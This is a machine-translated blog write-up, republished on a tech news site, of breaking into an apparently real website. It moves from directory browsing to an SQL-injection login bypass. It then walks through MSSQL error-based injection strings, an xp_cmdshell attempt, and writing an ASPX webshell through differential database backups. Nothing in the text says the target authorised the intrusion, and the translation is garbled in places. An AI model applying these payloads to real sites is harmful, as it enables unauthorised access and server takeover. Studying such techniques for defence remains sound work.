Shulou(Shulou.com)06/01 Report--

Preface of 0x00

The scanner scanned a website to browse the existing directory, so there is this article.

Popular science with knowledge points:

1. Catalog browsing

In my personal opinion, directory browsing is a more harmful vulnerability, which refers to "listing all file names and file information in that directory in a directory where there is no default document". If there is such a misconfiguration in the site, if you know the directory names, you can see the files in these directories.

two。 Differential backup condition site absolute path has path write permission with current database permission 0x01 body

The site was improperly configured, which led to directory browsing. By looking at the source code on the home page, I went to several directories.

If you visit one at random, you will report an error, indicating that the webmaster has not blocked the error message.

There is also a leak of information.

But usually the files in the directory need to pass parameters to execute, we do not know the parameter name, so there is no way to use

After tossing and turning, go to the front desk login interface to check.

After a try, it is found that there are injection and weak password admin in the password, that is, you can log in with the universal password.

Originally wanted to find a place to upload files, directly getshell, but found that does not seem to exist, but found that the site used kindeditor and the site absolute path

Well, there is injection at the login port in front, and there are generally a lot of injection in the background. Try to find it. If so, you can getshell with the absolute path.

Okok, found injection, but so far do not know what type of database, general aspx+mssql, because the previous found to be error, then try to use mssql error reporting method

% 'and 1=@@version-- a

Mssql database to check the current user identity

% 'and 1=user-- a

The permission of dbo is not sa. Try xp_cmdshell.

%'; exec ('master..xp_cmdshell whoami')-a

Xp_cmdshell is not enabled, and the permission of dbo is not sufficient to enable xp_cmdshell, so you can only try to use differential backup to write a webshell.

1. Get the current database name% 'and 1=db_name ()-a

two。 Backup the current database%'; backup database database name to disk = 'absolute path' with init-a

If the backup is successful, the page returns the query result of%'(because it is stacked and the execution of subsequent statements does not return a result)

3. Create the table and write webshell%';create table cmd (an image)-- a% alternate insert into cmd (a) values (0xxxxx)-- the hexe value of a / / webshell

You can use online tools, and the author uses the gadgets developed by myself.

4. Make a second backup%'; backup log database name to disk = 'absolute path\\ abc.aspx'--

Here I write webshell into a subdirectory, because there is a directory browsing, you can see exactly whether the file is generated

After successful creation, try to connect

If 0x02 can use xp_cmdshell directly in the future, try not to use differential backup, because it will produce backup files. If the database is very large, it will have an impact.

If there are any mistakes, please correct them.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.